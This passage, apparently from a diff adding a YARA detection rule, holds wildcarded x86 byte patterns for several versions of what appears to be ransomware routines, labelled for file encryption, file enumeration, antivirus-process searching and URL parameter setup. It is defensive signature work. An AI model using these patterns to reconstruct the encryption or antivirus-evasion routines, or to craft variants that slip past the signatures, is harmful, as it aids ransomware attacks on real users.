+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$url_parameters_setup_v5_0_1 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$crypt_files_v5_0_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
+            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
+            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
+            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
+            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
+            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
+            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
+            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
+            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
+            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
+            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
+            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
+            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
+            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
+            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
+            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
+            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v5_0_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
+            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
+            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5_0_1 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
+            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
+            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
+            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
+            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
+            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
+            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$set_url_parameters_v5_0_2 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$set_url_parameters_v5_0_3 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5_0_2 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
+            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
+            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
+            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
+            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
+            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
+            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v5_0_2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44
+            24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B
+            44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
+            8B E5 5D C3
+        }
+		$crypt_files_v5_0_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
+            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
